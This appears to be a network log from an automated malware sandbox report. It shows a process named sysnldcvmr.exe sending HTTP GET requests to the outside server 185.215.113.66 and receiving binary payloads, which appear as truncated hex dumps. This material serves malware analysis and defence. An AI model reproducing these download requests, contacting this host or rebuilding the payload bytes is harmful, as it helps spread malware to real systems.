                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  23192.168.2.1150003185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:33.921327114 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.287679911 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:35 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 9472
                                                                                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674f01b0-2500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: Eqn7n*%v u&PUK:PXwj>?hr"BH+<_i@Ft(*sIe0al.BM_$"o6*65&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O*0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b|HyW9>Sgx%2S\4`zG
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.287744045 CET124INData Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81
                                                                                                                                                                                                                                                  Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw|1r
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.291140079 CET1236INData Raw: a4 24 91 bc b1 db 4b dd 2f 2e 0a 15 f6 c5 76 91 95 d9 c2 24 e8 c1 a1 24 33 78 ce da c4 6a 9a 37 c2 47 a9 49 1f 18 c0 90 38 77 03 41 3e 24 f9 f8 aa 36 d3 9d 0d ff c2 f1 93 8a c7 96 ae 86 a0 4e f2 46 6a f5 68 32 6d e0 f3 5b f3 ba db cb 0e cc 3d 0b
                                                                                                                                                                                                                                                  Data Ascii: $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[A9\'xZLU'0O]f.SHzv_JnUC6C-!-H;DF6($enNQ>
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.291172028 CET1236INData Raw: 60 33 e4 57 f1 78 d1 30 0a 9b 62 2f 1d 1c 08 c3 a5 22 2e d1 34 87 16 2a 41 c9 4d ee 9b 30 49 1e e8 6a 53 83 23 cc 9c 17 d8 4f f9 27 31 01 56 11 23 a0 23 2b 2e 6a 74 1f 74 73 cb 11 cb c1 2a 0d ec 1a 0e ee 73 8d 1b 70 ac 87 f3 fc 34 46 db 9b d7 c1
                                                                                                                                                                                                                                                  Data Ascii: `3Wx0b/".4*AM0IjS#O'1V##+.jtts*sp4F9a0{W{+mF9_X#9`<`811MEECM_bOj2jvv;))z46WF7zcMOYmHJc)6m&%Z'|:.o85>$
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.291183949 CET248INData Raw: 10 68 68 88 46 46 6a 78 92 f2 b3 b1 36 e2 3e 60 62 7a b3 1b 8f dd 2b 47 f6 62 06 5f f8 6b dd 8a e1 9d 1a 3a 94 1f 1d ec 45 e3 a2 65 57 a4 05 98 f3 53 49 46 b8 0a 9c 2b d0 1c f8 6e ae b5 e5 cd f6 38 6c 2d 22 6b 9c 11 7a a2 2e d5 54 6f 28 f2 29 3e
                                                                                                                                                                                                                                                  Data Ascii: hhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\epgWKc@erY7>(f5a@`/2Bv(M}J^!P8XG+oP,8Jp$U%-I<
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.291301966 CET1236INData Raw: 01 5e 1e 42 70 f5 61 73 f1 0c 3e fb ed 02 70 e3 f2 8d 7f 63 08 8e 11 34 36 48 68 74 e5 6c fd 21 7b e7 09 bc e5 e6 a4 c2 a6 e9 8a f5 1b 49 0f dc cc 82 ee 89 3a db 91 dc 48 5d c4 98 b8 0a ed b8 9b 4c 28 09 ce cd 2b 86 8b 9d 2d 80 57 c4 60 4b 06 a6
                                                                                                                                                                                                                                                  Data Ascii: ^Bpas>pc46Hhtl!{I:H]L(+-W`KkE_P@%))"=$%<b80{`\3@<U/t-%"[-7(*q.S.e|a_iB>9m2Q|cjC,uMQ&ez; >}V`?`0
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.291368961 CET1236INData Raw: 15 9d fe f4 07 05 d4 1f f0 a0 6c d7 0d 39 91 a5 49 3c 8c eb 10 ca 4d 06 b0 60 1b 8d 58 c7 ab 92 c7 6b 55 73 52 ea 55 db d8 37 96 94 06 5a f4 de d8 41 92 1d 88 57 80 f0 71 ad ce 92 66 d8 88 f2 98 f1 66 20 d4 ab ff c3 3c af a6 a0 83 3e b2 ed b3 a0
                                                                                                                                                                                                                                                  Data Ascii: l9I<M`XkUsRU7ZAWqff <>j+Sh.Psl)cbF{q<Cj?=~,6,$yZ_74QuGS_C|Pn-b'npNv:A+[97]Lg!7[,m["*?{|(|v
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.291393042 CET248INData Raw: 08 27 45 cd 18 52 40 e6 c0 c5 d7 9c b3 55 03 87 49 31 c8 3e f3 3c a4 ce 21 1d b9 07 76 a5 4d fa 01 d5 59 74 0e 97 25 b1 17 6a ae 4d 8d a3 26 b7 54 27 30 df 79 e7 77 51 ef 0e e9 db db 06 62 c7 b9 15 b1 b4 6a 0c a6 e2 c5 1e 41 70 6d 8c 37 64 c6 eb
                                                                                                                                                                                                                                                  Data Ascii: 'ER@UI1><!vMYt%jM&T'0ywQbjApm7d`YA8dFIy{7{,wdFQg7TRorwfw`[q/LC]CmBqbWvI}DNAW[f*cSqZ_hMt1JA:
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.293134928 CET1236INData Raw: c3 40 7a 9b 27 88 a7 3d f3 4f 76 4f 9d 81 2a b8 bb 78 1e 60 55 87 2d 9c f4 43 a7 94 ea a1 c2 c9 2f b8 1a 96 e8 d8 3d 74 c2 4d 2c e7 ed 9f 87 5a 87 18 a2 55 92 88 6d 32 bc 9e ca 3d fc 86 bc 95 a6 19 f7 67 2c bc a2 27 0b 4e da 6e 9e 27 b8 1d 15 29
                                                                                                                                                                                                                                                  Data Ascii: @z'=OvO*x`U-C/=tM,ZUm2=g,'Nn')/C]jmO2qPy,v5yQiQl[x;l@>ULb@7pi.Rxju}Kw(|JC79dh<>}+4mXHBhQ%
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.293194056 CET1236INData Raw: 54 04 7d 2a c5 e8 7a 84 17 11 2f 10 d3 cc a0 28 56 de b0 1d 7f e5 62 6e 42 76 ba fa 46 3e c1 2e 67 c3 68 cb 43 43 dc 04 be e4 87 e3 86 cd bd 5c c0 ef 84 63 ee 86 09 76 95 ee 98 48 cd 8c 37 bd fc 9e 5b 38 2d 26 09 9e 8d 78 09 76 22 65 39 fd 91 cb
                                                                                                                                                                                                                                                  Data Ascii: T}*z/(VbnBvF>.ghCC\cvH7[8-&xv"e9c2M7|t5s<VUnMi.~_'L@"(?rTb2Ha1&w<+nlm4\h>6?lP~'3O|DHHojCa->'XcEgPf
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:35.407599926 CET248INData Raw: e9 c3 ae 8e 6a d3 fc a6 86 82 41 8a fc 7e 31 e7 3c 59 3d 6a f3 b0 5d 45 4a 20 05 88 25 a9 6c a6 3e 02 3f 36 e5 aa 27 5e 1e 60 ea aa 20 34 96 cf 5b a1 27 b2 53 54 c3 14 79 01 c2 90 6f 30 32 3f 9e 49 33 5c 7b 23 41 b9 9a 64 6a 3b af 26 be 56 e8 63
                                                                                                                                                                                                                                                  Data Ascii: jA~1<Y=j]EJ %l>?6'^` 4['STyo02?I3\{#Adj;&Vcrt^DiTWrG3qw}CG?aDSWl)mG[evIxBZQWW0pvuf~Q[UZk";g6wjI'i[+`0.q:I$Dy_


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  24192.168.2.1150010185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:37.559835911 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.893277884 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:38 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 10496
                                                                                                                                                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67154d18-2900"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.893296003 CET124INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.894095898 CET1236INData Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35
                                                                                                                                                                                                                                                  Data Ascii: *B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.894140005 CET1236INData Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65
                                                                                                                                                                                                                                                  Data Ascii: Ku"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.894154072 CET248INData Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66
                                                                                                                                                                                                                                                  Data Ascii: >"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.894974947 CET1236INData Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec
                                                                                                                                                                                                                                                  Data Ascii: `{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWmlE)Mt9G2?=L*{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.895030975 CET1236INData Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06
                                                                                                                                                                                                                                                  Data Ascii: ]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.895040035 CET248INData Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6
                                                                                                                                                                                                                                                  Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.895761013 CET1236INData Raw: 1f c2 c0 01 a9 a1 6d 1c 12 79 22 13 1e 59 39 ac 6f ba 33 c7 51 89 42 71 cf 1c 0c 8a a5 b3 a3 8e 59 56 d1 23 1f 09 19 56 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6
                                                                                                                                                                                                                                                  Data Ascii: my"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:38.895874023 CET1236INData Raw: f5 12 b9 95 02 be ba 75 47 ee c3 6f 92 65 e2 78 09 e4 c1 46 cc f6 1a 2a bb a3 8c 2d 7e 51 f6 94 14 b6 19 09 ee 3b 59 30 f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10
                                                                                                                                                                                                                                                  Data Ascii: uGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:39.013165951 CET248INData Raw: c9 88 00 75 4b d3 b6 be 4d 95 9b 0d 4d f4 17 76 5e fa 2b 9b 0d 20 96 0b b5 51 59 b2 eb 86 49 f2 fd df a5 5f 55 95 cb 16 94 79 43 38 76 1d ea 1d 23 22 0d e0 3d dc cd 3c 89 ff 1c ea 64 59 7a 0c 20 7f 25 9a ba 2e 3a 4f cf b4 fc 36 ca 60 fb 02 2f fb
                                                                                                                                                                                                                                                  Data Ascii: uKMMv^+ QYI_UyC8v#"=<dYz %.:O6`/Js=vHBjc0nWNl+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)p


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  25192.168.2.1150020185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:41.379803896 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671423912 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:42 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 55040
                                                                                                                                                                                                                                                  Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674b357a-d700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" |%LB|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<|TwX?Fq)3Pr|\jFC4wa|zk9eT*G$IFxP!+*(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+|~z0g[:e2?zO*_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQ*chAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671480894 CET1236INData Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5
                                                                                                                                                                                                                                                  Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW|
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671504974 CET1236INData Raw: 21 40 2e 7a e6 15 b0 99 e8 de ee 46 43 de 03 52 a6 24 16 2a b3 5d d1 a1 7f a1 78 24 78 cf 01 39 d9 7c 1d f8 bc 81 03 92 ba 67 09 de e8 5d f4 fa 51 0c a3 36 e6 93 c9 a6 8d b5 2b 22 59 9a f8 e5 f7 e7 93 69 b0 54 20 09 4a 3a 9e ac 16 cc 15 f9 31 da
                                                                                                                                                                                                                                                  Data Ascii: !@.zFCR$*]x$x9|g]Q6+"YiT J:1kYK`coIIe=v)~::N({6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#|;d!q?+y<pt
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671518087 CET1236INData Raw: cd d1 88 5e 0c ed 76 fb ad be 0a a0 18 35 82 a1 cb 1b 3e b3 21 1e 3e 41 05 44 f1 f3 d5 fe ad 57 3e 15 da 27 7e 21 35 8b 3d c0 9e 5b af ce d8 4e 88 c6 51 fe 94 d0 20 09 09 3f f8 77 0a 3a a9 b9 2f a3 a6 29 bb 72 f7 4b e7 60 04 4f b2 26 72 bc 69 0d
                                                                                                                                                                                                                                                  Data Ascii: ^v5>!>ADW>'~!5=[NQ ?w:/)rK`O&riw`qN;W&Z/f$t9n9H4{(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h
